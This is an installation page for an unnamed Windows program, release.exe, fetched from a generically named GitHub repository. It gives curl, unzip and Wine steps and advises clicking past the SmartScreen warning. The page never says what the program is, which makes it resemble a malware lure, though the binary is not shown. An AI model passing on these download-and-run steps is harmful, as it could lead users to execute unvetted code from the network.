Installation
Pick your OS. Use the Copy button on each command block.
Portable · single .exe
No installer
Auto-updates every 48h
Download the archive
Open the Download page, accept the MIT license and grab release.zip.
Extract
Right-click the archive and choose “Extract All”, or via PowerShell:
PowerShell
PS> Expand-Archive -Path .\release.zip -DestinationPath .\release PS> cd .\release
Run
Double-click release.exe, or launch it from the terminal:
cmd.exe
> .\release.exeSmartScreen may warn on first launch. Click “More info → Run anyway” if you trust the source.
Download via curl
bash
$ curl -LO https://github.com/adrianstykles10/release-setup-2026/releases/download/release/release.zipOr download manually from the Download page.
Extract
bash
$ unzip release.zip -d ~/release $ cd ~/release
Install Wine (if not installed)
The build is a Windows binary — run it under Wine.
bash · debian / ubuntu
$ sudo apt update && sudo apt install -y winebash · arch
$ sudo pacman -S winebash · fedora
$ sudo dnf install -y wineRun
bash
$ wine release.exe